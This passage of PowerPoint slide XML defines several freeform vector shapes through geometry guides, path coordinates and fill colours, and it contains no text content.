                <a:off x="1870" y="2432"/>
                <a:ext cx="97" cy="30"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 97 w 97"/>
                  <a:gd name="T1" fmla="*/ 10 h 30"/>
                  <a:gd name="T2" fmla="*/ 1 w 97"/>
                  <a:gd name="T3" fmla="*/ 0 h 30"/>
                  <a:gd name="T4" fmla="*/ 0 w 97"/>
                  <a:gd name="T5" fmla="*/ 10 h 30"/>
                  <a:gd name="T6" fmla="*/ 94 w 97"/>
                  <a:gd name="T7" fmla="*/ 30 h 30"/>
                  <a:gd name="T8" fmla="*/ 97 w 97"/>
                  <a:gd name="T9" fmla="*/ 10 h 30"/>
                  <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T15" fmla="*/ 0 w 97"/>
                  <a:gd name="T16" fmla="*/ 0 h 30"/>
                  <a:gd name="T17" fmla="*/ 97 w 97"/>
                  <a:gd name="T18" fmla="*/ 30 h 30"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="T10">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="T11">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="T12">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="T13">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                  <a:cxn ang="T14">
                    <a:pos x="T8" y="T9"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="T15" t="T16" r="T17" b="T18"/>
                <a:pathLst>
                  <a:path w="97" h="30">
                    <a:moveTo>
                      <a:pt x="97" y="10"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="10"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10769" name="Freeform 176"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1918" y="2441"/>
                <a:ext cx="42" cy="14"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 42 w 42"/>
                  <a:gd name="T1" fmla="*/ 6 h 14"/>
                  <a:gd name="T2" fmla="*/ 1 w 42"/>
                  <a:gd name="T3" fmla="*/ 0 h 14"/>
                  <a:gd name="T4" fmla="*/ 0 w 42"/>
                  <a:gd name="T5" fmla="*/ 6 h 14"/>
                  <a:gd name="T6" fmla="*/ 40 w 42"/>
                  <a:gd name="T7" fmla="*/ 14 h 14"/>
                  <a:gd name="T8" fmla="*/ 42 w 42"/>
                  <a:gd name="T9" fmla="*/ 6 h 14"/>
                  <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T15" fmla="*/ 0 w 42"/>
                  <a:gd name="T16" fmla="*/ 0 h 14"/>
                  <a:gd name="T17" fmla="*/ 42 w 42"/>
                  <a:gd name="T18" fmla="*/ 14 h 14"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="T10">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="T11">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="T12">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="T13">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                  <a:cxn ang="T14">
                    <a:pos x="T8" y="T9"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="T15" t="T16" r="T17" b="T18"/>
                <a:pathLst>
                  <a:path w="42" h="14">
                    <a:moveTo>
                      <a:pt x="42" y="6"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="6"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="99D8D8"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10770" name="Freeform 177"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1876" y="2434"/>
                <a:ext cx="28" cy="11"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 28 w 28"/>
                  <a:gd name="T1" fmla="*/ 5 h 11"/>
                  <a:gd name="T2" fmla="*/ 0 w 28"/>
                  <a:gd name="T3" fmla="*/ 0 h 11"/>
                  <a:gd name="T4" fmla="*/ 0 w 28"/>
                  <a:gd name="T5" fmla="*/ 6 h 11"/>
                  <a:gd name="T6" fmla="*/ 27 w 28"/>
                  <a:gd name="T7" fmla="*/ 11 h 11"/>
                  <a:gd name="T8" fmla="*/ 28 w 28"/>
                  <a:gd name="T9" fmla="*/ 5 h 11"/>
                  <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T15" fmla="*/ 0 w 28"/>
                  <a:gd name="T16" fmla="*/ 0 h 11"/>
                  <a:gd name="T17" fmla="*/ 28 w 28"/>
                  <a:gd name="T18" fmla="*/ 11 h 11"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="T10">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="T11">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="T12">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="T13">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                  <a:cxn ang="T14">
                    <a:pos x="T8" y="T9"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="T15" t="T16" r="T17" b="T18"/>
                <a:pathLst>
                  <a:path w="28" h="11">
                    <a:moveTo>
                      <a:pt x="28" y="5"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="5"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="99D8D8"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10771" name="Freeform 178"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1807" y="2445"/>
                <a:ext cx="162" cy="54"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 162"/>
                  <a:gd name="T1" fmla="*/ 16 h 54"/>
                  <a:gd name="T2" fmla="*/ 0 w 162"/>
                  <a:gd name="T3" fmla="*/ 16 h 54"/>
                  <a:gd name="T4" fmla="*/ 1 w 162"/>
                  <a:gd name="T5" fmla="*/ 16 h 54"/>
                  <a:gd name="T6" fmla="*/ 3 w 162"/>
                  <a:gd name="T7" fmla="*/ 16 h 54"/>
                  <a:gd name="T8" fmla="*/ 5 w 162"/>
                  <a:gd name="T9" fmla="*/ 15 h 54"/>
                  <a:gd name="T10" fmla="*/ 7 w 162"/>
                  <a:gd name="T11" fmla="*/ 15 h 54"/>
                  <a:gd name="T12" fmla="*/ 11 w 162"/>
                  <a:gd name="T13" fmla="*/ 14 h 54"/>
                  <a:gd name="T14" fmla="*/ 14 w 162"/>
                  <a:gd name="T15" fmla="*/ 14 h 54"/>
                  <a:gd name="T16" fmla="*/ 18 w 162"/>
                  <a:gd name="T17" fmla="*/ 13 h 54"/>
                  <a:gd name="T18" fmla="*/ 21 w 162"/>
                  <a:gd name="T19" fmla="*/ 12 h 54"/>
                  <a:gd name="T20" fmla="*/ 25 w 162"/>
                  <a:gd name="T21" fmla="*/ 10 h 54"/>
                  <a:gd name="T22" fmla="*/ 28 w 162"/>
                  <a:gd name="T23" fmla="*/ 9 h 54"/>
                  <a:gd name="T24" fmla="*/ 32 w 162"/>
                  <a:gd name="T25" fmla="*/ 8 h 54"/>
                  <a:gd name="T26" fmla="*/ 35 w 162"/>
                  <a:gd name="T27" fmla="*/ 6 h 54"/>
                  <a:gd name="T28" fmla="*/ 38 w 162"/>
                  <a:gd name="T29" fmla="*/ 4 h 54"/>
                  <a:gd name="T30" fmla="*/ 41 w 162"/>
                  <a:gd name="T31" fmla="*/ 2 h 54"/>
                  <a:gd name="T32" fmla="*/ 43 w 162"/>
                  <a:gd name="T33" fmla="*/ 0 h 54"/>
                  <a:gd name="T34" fmla="*/ 162 w 162"/>
                  <a:gd name="T35" fmla="*/ 28 h 54"/>
                  <a:gd name="T36" fmla="*/ 162 w 162"/>
                  <a:gd name="T37" fmla="*/ 28 h 54"/>
                  <a:gd name="T38" fmla="*/ 161 w 162"/>
                  <a:gd name="T39" fmla="*/ 28 h 54"/>
                  <a:gd name="T40" fmla="*/ 160 w 162"/>
                  <a:gd name="T41" fmla="*/ 29 h 54"/>
                  <a:gd name="T42" fmla="*/ 159 w 162"/>
                  <a:gd name="T43" fmla="*/ 30 h 54"/>
                  <a:gd name="T44" fmla="*/ 158 w 162"/>
                  <a:gd name="T45" fmla="*/ 33 h 54"/>
                  <a:gd name="T46" fmla="*/ 155 w 162"/>
                  <a:gd name="T47" fmla="*/ 34 h 54"/>
                  <a:gd name="T48" fmla="*/ 153 w 162"/>
                  <a:gd name="T49" fmla="*/ 36 h 54"/>
                  <a:gd name="T50" fmla="*/ 151 w 162"/>
                  <a:gd name="T51" fmla="*/ 38 h 54"/>
                  <a:gd name="T52" fmla="*/ 147 w 162"/>
                  <a:gd name="T53" fmla="*/ 41 h 54"/>
                  <a:gd name="T54" fmla="*/ 145 w 162"/>
                  <a:gd name="T55" fmla="*/ 43 h 54"/>
                  <a:gd name="T56" fmla="*/ 141 w 162"/>
                  <a:gd name="T57" fmla="*/ 45 h 54"/>
                  <a:gd name="T58" fmla="*/ 138 w 162"/>
                  <a:gd name="T59" fmla="*/ 48 h 54"/>
                  <a:gd name="T60" fmla="*/ 136 w 162"/>
                  <a:gd name="T61" fmla="*/ 49 h 54"/>
                  <a:gd name="T62" fmla="*/ 132 w 162"/>
                  <a:gd name="T63" fmla="*/ 51 h 54"/>
                  <a:gd name="T64" fmla="*/ 129 w 162"/>
                  <a:gd name="T65" fmla="*/ 52 h 54"/>
                  <a:gd name="T66" fmla="*/ 126 w 162"/>
                  <a:gd name="T67" fmla="*/ 54 h 54"/>
                  <a:gd name="T68" fmla="*/ 0 w 162"/>
                  <a:gd name="T69" fmla="*/ 16 h 5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2"/>
                  <a:gd name="T106" fmla="*/ 0 h 54"/>
                  <a:gd name="T107" fmla="*/ 162 w 162"/>
                  <a:gd name="T108" fmla="*/ 54 h 5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2" h="54">
                    <a:moveTo>
                      <a:pt x="0" y="16"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="16"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="99D8D8"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10772" name="Freeform 179"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1969" y="2439"/>
                <a:ext cx="58" cy="26"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 6 w 58"/>
                  <a:gd name="T1" fmla="*/ 26 h 26"/>
                  <a:gd name="T2" fmla="*/ 58 w 58"/>
                  <a:gd name="T3" fmla="*/ 10 h 26"/>
                  <a:gd name="T4" fmla="*/ 26 w 58"/>
                  <a:gd name="T5" fmla="*/ 0 h 26"/>
                  <a:gd name="T6" fmla="*/ 0 w 58"/>
                  <a:gd name="T7" fmla="*/ 3 h 26"/>
                  <a:gd name="T8" fmla="*/ 0 w 58"/>
                  <a:gd name="T9" fmla="*/ 25 h 26"/>
                  <a:gd name="T10" fmla="*/ 6 w 58"/>
                  <a:gd name="T11" fmla="*/ 26 h 26"/>
                  <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T15" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T16" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T17" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T18" fmla="*/ 0 w 58"/>
                  <a:gd name="T19" fmla="*/ 0 h 26"/>
                  <a:gd name="T20" fmla="*/ 58 w 58"/>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8" h="26">
                    <a:moveTo>
                      <a:pt x="6" y="26"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="58" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="26"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="001999"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10773" name="Freeform 180"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1819" y="2328"/>
                <a:ext cx="31" cy="124"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 31 w 31"/>
                  <a:gd name="T1" fmla="*/ 3 h 124"/>
                  <a:gd name="T2" fmla="*/ 31 w 31"/>
                  <a:gd name="T3" fmla="*/ 2 h 124"/>
                  <a:gd name="T4" fmla="*/ 30 w 31"/>
                  <a:gd name="T5" fmla="*/ 2 h 124"/>
                  <a:gd name="T6" fmla="*/ 30 w 31"/>
                  <a:gd name="T7" fmla="*/ 2 h 124"/>
                  <a:gd name="T8" fmla="*/ 29 w 31"/>
                  <a:gd name="T9" fmla="*/ 2 h 124"/>
                  <a:gd name="T10" fmla="*/ 27 w 31"/>
                  <a:gd name="T11" fmla="*/ 1 h 124"/>
                  <a:gd name="T12" fmla="*/ 26 w 31"/>
                  <a:gd name="T13" fmla="*/ 1 h 124"/>
                  <a:gd name="T14" fmla="*/ 23 w 31"/>
                  <a:gd name="T15" fmla="*/ 0 h 124"/>
                  <a:gd name="T16" fmla="*/ 22 w 31"/>
                  <a:gd name="T17" fmla="*/ 0 h 124"/>
                  <a:gd name="T18" fmla="*/ 20 w 31"/>
                  <a:gd name="T19" fmla="*/ 0 h 124"/>
                  <a:gd name="T20" fmla="*/ 17 w 31"/>
                  <a:gd name="T21" fmla="*/ 0 h 124"/>
                  <a:gd name="T22" fmla="*/ 14 w 31"/>
                  <a:gd name="T23" fmla="*/ 0 h 124"/>
                  <a:gd name="T24" fmla="*/ 12 w 31"/>
                  <a:gd name="T25" fmla="*/ 1 h 124"/>
                  <a:gd name="T26" fmla="*/ 9 w 31"/>
                  <a:gd name="T27" fmla="*/ 1 h 124"/>
                  <a:gd name="T28" fmla="*/ 6 w 31"/>
                  <a:gd name="T29" fmla="*/ 2 h 124"/>
                  <a:gd name="T30" fmla="*/ 3 w 31"/>
                  <a:gd name="T31" fmla="*/ 3 h 124"/>
                  <a:gd name="T32" fmla="*/ 0 w 31"/>
                  <a:gd name="T33" fmla="*/ 6 h 124"/>
                  <a:gd name="T34" fmla="*/ 0 w 31"/>
                  <a:gd name="T35" fmla="*/ 124 h 124"/>
                  <a:gd name="T36" fmla="*/ 1 w 31"/>
                  <a:gd name="T37" fmla="*/ 124 h 124"/>
                  <a:gd name="T38" fmla="*/ 1 w 31"/>
                  <a:gd name="T39" fmla="*/ 124 h 124"/>
                  <a:gd name="T40" fmla="*/ 2 w 31"/>
                  <a:gd name="T41" fmla="*/ 124 h 124"/>
                  <a:gd name="T42" fmla="*/ 3 w 31"/>
                  <a:gd name="T43" fmla="*/ 124 h 124"/>
                  <a:gd name="T44" fmla="*/ 5 w 31"/>
                  <a:gd name="T45" fmla="*/ 123 h 124"/>
                  <a:gd name="T46" fmla="*/ 7 w 31"/>
                  <a:gd name="T47" fmla="*/ 123 h 124"/>
                  <a:gd name="T48" fmla="*/ 8 w 31"/>
                  <a:gd name="T49" fmla="*/ 123 h 124"/>
                  <a:gd name="T50" fmla="*/ 10 w 31"/>
                  <a:gd name="T51" fmla="*/ 121 h 124"/>
                  <a:gd name="T52" fmla="*/ 13 w 31"/>
                  <a:gd name="T53" fmla="*/ 121 h 124"/>
                  <a:gd name="T54" fmla="*/ 15 w 31"/>
                  <a:gd name="T55" fmla="*/ 120 h 124"/>
                  <a:gd name="T56" fmla="*/ 17 w 31"/>
                  <a:gd name="T57" fmla="*/ 119 h 124"/>
                  <a:gd name="T58" fmla="*/ 21 w 31"/>
                  <a:gd name="T59" fmla="*/ 118 h 124"/>
                  <a:gd name="T60" fmla="*/ 23 w 31"/>
                  <a:gd name="T61" fmla="*/ 117 h 124"/>
                  <a:gd name="T62" fmla="*/ 26 w 31"/>
                  <a:gd name="T63" fmla="*/ 116 h 124"/>
                  <a:gd name="T64" fmla="*/ 29 w 31"/>
                  <a:gd name="T65" fmla="*/ 113 h 124"/>
                  <a:gd name="T66" fmla="*/ 31 w 31"/>
                  <a:gd name="T67" fmla="*/ 112 h 124"/>
                  <a:gd name="T68" fmla="*/ 31 w 31"/>
                  <a:gd name="T69" fmla="*/ 3 h 1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1"/>
                  <a:gd name="T106" fmla="*/ 0 h 124"/>
                  <a:gd name="T107" fmla="*/ 31 w 31"/>
                  <a:gd name="T108" fmla="*/ 124 h 1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1" h="124">
                    <a:moveTo>
                      <a:pt x="31" y="3"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="31" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="3"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="7FBFBF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10774" name="Freeform 181"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1820" y="2329"/>
                <a:ext cx="27" cy="104"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 27 w 27"/>
                  <a:gd name="T1" fmla="*/ 2 h 104"/>
                  <a:gd name="T2" fmla="*/ 27 w 27"/>
                  <a:gd name="T3" fmla="*/ 2 h 104"/>
                  <a:gd name="T4" fmla="*/ 26 w 27"/>
                  <a:gd name="T5" fmla="*/ 2 h 104"/>
                  <a:gd name="T6" fmla="*/ 26 w 27"/>
                  <a:gd name="T7" fmla="*/ 2 h 104"/>
                  <a:gd name="T8" fmla="*/ 25 w 27"/>
                  <a:gd name="T9" fmla="*/ 1 h 104"/>
                  <a:gd name="T10" fmla="*/ 23 w 27"/>
                  <a:gd name="T11" fmla="*/ 1 h 104"/>
                  <a:gd name="T12" fmla="*/ 22 w 27"/>
                  <a:gd name="T13" fmla="*/ 0 h 104"/>
                  <a:gd name="T14" fmla="*/ 20 w 27"/>
                  <a:gd name="T15" fmla="*/ 0 h 104"/>
                  <a:gd name="T16" fmla="*/ 19 w 27"/>
                  <a:gd name="T17" fmla="*/ 0 h 104"/>
                  <a:gd name="T18" fmla="*/ 16 w 27"/>
                  <a:gd name="T19" fmla="*/ 0 h 104"/>
                  <a:gd name="T20" fmla="*/ 14 w 27"/>
                  <a:gd name="T21" fmla="*/ 0 h 104"/>
                  <a:gd name="T22" fmla="*/ 12 w 27"/>
                  <a:gd name="T23" fmla="*/ 0 h 104"/>
                  <a:gd name="T24" fmla="*/ 9 w 27"/>
                  <a:gd name="T25" fmla="*/ 0 h 104"/>
                  <a:gd name="T26" fmla="*/ 8 w 27"/>
                  <a:gd name="T27" fmla="*/ 1 h 104"/>
                  <a:gd name="T28" fmla="*/ 5 w 27"/>
                  <a:gd name="T29" fmla="*/ 2 h 104"/>
                  <a:gd name="T30" fmla="*/ 2 w 27"/>
                  <a:gd name="T31" fmla="*/ 4 h 104"/>
                  <a:gd name="T32" fmla="*/ 0 w 27"/>
                  <a:gd name="T33" fmla="*/ 5 h 104"/>
                  <a:gd name="T34" fmla="*/ 0 w 27"/>
                  <a:gd name="T35" fmla="*/ 104 h 104"/>
                  <a:gd name="T36" fmla="*/ 0 w 27"/>
                  <a:gd name="T37" fmla="*/ 104 h 104"/>
                  <a:gd name="T38" fmla="*/ 1 w 27"/>
                  <a:gd name="T39" fmla="*/ 104 h 104"/>
                  <a:gd name="T40" fmla="*/ 1 w 27"/>
                  <a:gd name="T41" fmla="*/ 104 h 104"/>
